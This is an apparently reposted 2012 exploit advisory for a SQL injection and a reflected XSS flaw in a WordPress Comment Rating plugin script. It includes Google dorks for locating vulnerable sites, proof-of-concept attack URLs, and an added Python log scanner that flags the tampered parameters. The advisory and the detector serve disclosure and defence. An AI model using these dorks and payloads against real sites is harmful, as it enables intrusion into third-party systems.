WordPress Comment Rating Cross Site Scripting / SQL Injection

2012.01.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89, CWE-79

# Exploit Title: WordPress Comment Rating plugin multiple vulnerabilities
# Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
#              2- inurl:"/ck-processkarma.php?id="
# Date: 2/1/2012
# Author: The Evil Thinker
# Contact: Enstene156@hotmail.fr
# Software Link: www.wordpress.com
# Vulnerable plugin: Comment Rating plugin
# Tested on: Linux

Details:
---------
The vulnerable file is "ck-processkarma.php". The script does not filter its input parameters: the "id" parameter is used unsanitized in a database query (SQL injection) and the "path" parameter is reflected unescaped in the response (cross-site scripting).

PoC 1 (XSS):
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=

PoC 2 (SQL injection):
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=

-------------------------------------------------------------------------------------------
Special Greetz: Zack (DBA-HACKER), Siper-N, Root-Mar, Anash, H!ch4m, Dr.Unknown, Mario-Gomez, BiiF0, o Bla mantawel LLista
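The advisory gives defenders two concrete things to look for in web server logs: requests to ck-processkarma.php whose "id" is not a plain integer, and requests whose "path" carries markup. The following script is an added example (not part of the advisory and not code from the plugin) that applies exactly those two checks to access-log lines in combined log format. The log lines, IP addresses and hostnames in it are constructed for illustration; the script path is the one named in the advisory.

```python
"""Flag requests to the Comment Rating plugin's ck-processkarma.php whose
'id' or 'path' query parameters look tampered with.

Added example for the advisory above; the log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path named in the advisory.
TARGET_SCRIPT = "/wp-content/plugins/comment-rating/ck-processkarma.php"

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Anything that could start a tag or a script URL inside the reflected 'path'.
HTML_OR_JS = re.compile(r"<|>|javascript:", re.IGNORECASE)

# Constructed sample traffic (not real logs): one benign hit, one with markup in
# 'path', one with a non-integer 'id', and one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jan/2012:10:00:01 +0100] "GET /wp-content/plugins/comment-rating/ck-processkarma.php?id=42&action=add&path=http://blog.example/wp-content/plugins/comment-rating/&imgIndex= HTTP/1.1" 200 12
203.0.113.6 - - [04/Jan/2012:10:00:02 +0100] "GET /wp-content/plugins/comment-rating/ck-processkarma.php?id=42&action=add&path=%3Cscript%3Ealert(1)%3C/script%3E&imgIndex= HTTP/1.1" 200 90
203.0.113.7 - - [04/Jan/2012:10:00:03 +0100] "GET /wp-content/plugins/comment-rating/ck-processkarma.php?id=42%27&action=add&path=x&imgIndex= HTTP/1.1" 500 0
203.0.113.8 - - [04/Jan/2012:10:00:04 +0100] "GET /index.php HTTP/1.1" 200 512
"""


def check_request(target):
    """Return a list of (parameter, reason) findings for one request target.

    An empty list means the request is not for the plugin script or its
    parameters pass both checks.
    """
    parts = urlsplit(target)
    if parts.path != TARGET_SCRIPT:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # 'id' must be a bare integer; anything else is a candidate SQL injection.
    for value in params.get("id", []):
        if not value.isdigit():
            findings.append(("id", "non-integer id (possible SQL injection)"))
    # 'path' is reflected into the page; markup or script URLs are suspicious.
    # unquote() a second time to catch double-encoded payloads.
    for value in params.get("path", []):
        if HTML_OR_JS.search(unquote(value)):
            findings.append(("path", "markup in path (possible reflected XSS)"))
    return findings


def scan_log(text):
    """Return [(ip, target, findings)] for every suspicious request in the log."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        findings = check_request(m.group("target"))
        if findings:
            alerts.append((m.group("ip"), m.group("target"), findings))
    return alerts


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        for param, reason in findings:
            print(f"{ip} {param}: {reason} -> {target}")
```

The integer check on "id" is deliberately strict rather than signature-based: the plugin only ever needs a numeric comment id, so any other value is worth a look regardless of which injection technique produced it. The same two rules (cast "id" to an integer before it reaches the query, and escape "path" before it is echoed) are what a fix inside the plugin itself would apply.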


Copyright 2024, cxsecurity.com